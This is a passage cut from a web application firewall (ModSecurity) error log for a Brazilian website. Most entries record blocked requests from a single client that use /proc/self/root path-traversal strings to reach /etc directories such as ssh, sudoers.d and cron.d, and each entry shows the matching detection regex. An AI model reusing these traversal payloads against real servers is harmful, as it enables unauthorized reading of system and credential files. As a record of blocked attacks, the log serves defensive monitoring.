"abf6Vpqj1wV0Si-OkefXCgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:56.009951 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:51976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6WBXjF1vJNtV6CWrmVgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:57.303048 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:51988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Wf9ocpUE4ed4uDzaaAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:59.095214 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:51994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6W7ysWC90G-1nBrAyywAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:00.477496 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:33494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6XHbQATo66fKoS7w6VQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:01.790230 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:33500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6XXbQATo66fKoS7w6VgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:03.131537 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:33504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6X9SswJuvopo3lOhNaAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:04.494184 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:33508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6YAlT9VtDQc7bgUyZrgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:05.805593 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:33510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6YXbQATo66fKoS7w6WwAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:07.071546 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:33524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6YwlT9VtDQc7bgUyZrwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:08.347929 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.243.203:33538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ZBXjF1vJNtV6CWrmWwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:09.694233 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:33550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ZXjZBu2q05ozVU9DcgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:11.014128 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:54410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Z_9ocpUE4ed4uDzabAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:12.172396 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:54416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6aNSswJuvopo3lOhNaQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:13.474765 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:54424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6aQlT9VtDQc7bgUyZsQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:14.803347 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:54440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ahXjF1vJNtV6CWrmXQAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:15.991523 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:54444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6a3jZBu2q05ozVU9DcwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:17.242730 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:54456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6bQlT9VtDQc7bgUyZswAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:18.775825 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:54460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6bo6lpbStxTqkSktcYwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:20.086620 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:54474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6cJqj1wV0Si-OkefXIwAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:21.481583 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:37132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6cY6lpbStxTqkSktcZAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:41:22.820047 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:37136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6cnbQATo66fKoS7w6XwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:24.130746 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:37142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6dNSswJuvopo3lOhNbgAAAI8"], referer: 